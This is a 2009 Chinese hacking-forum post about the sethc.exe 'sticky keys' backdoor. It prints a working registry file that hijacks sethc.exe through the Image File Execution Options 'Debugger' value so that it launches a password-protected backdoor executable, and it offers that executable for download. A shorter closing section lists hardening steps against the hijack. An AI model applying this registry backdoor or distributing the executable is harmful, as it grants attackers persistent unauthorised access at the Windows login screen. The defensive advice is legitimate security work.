找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1541|回复: 0

sethc.exe新的镜像劫持技术和安全防御!(shift后门)

[复制链接]

68

主题

357

回帖

620

牛毛

一级牛人

积分
620
QQ
发表于 2009-4-24 22:16:12 | 显示全部楼层 |阅读模式 来自 河南省新乡市
本帖最后由 122****5105 于 2009-4-24 22:17 编辑



今天群里朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码.
5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角...
前提是先运行个p处理或reg,这个方法比较牛X..
注册表如下
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\www.winshell.cn.exe"

这个exe存的路径是:c:\\www.winshell.cn.exe
exe文件顺便发上来...登陆密码:猜吧.
下载地址
-----------------------------------------------------以下是安全设置---------------------------
知道上边原理:就可以设置安全了....
在服务器里按5下shift,出设置把所有的对号去掉.
删除所有文件安全设置下用户,加everyone设置全部拒绝
C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的sethc.exe
修改注册表权限,同上.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
1214649638_85275e16.jpg
1214649880_84499a43.jpg
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-29 01:01 , Processed in 0.273254 second(s), 38 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表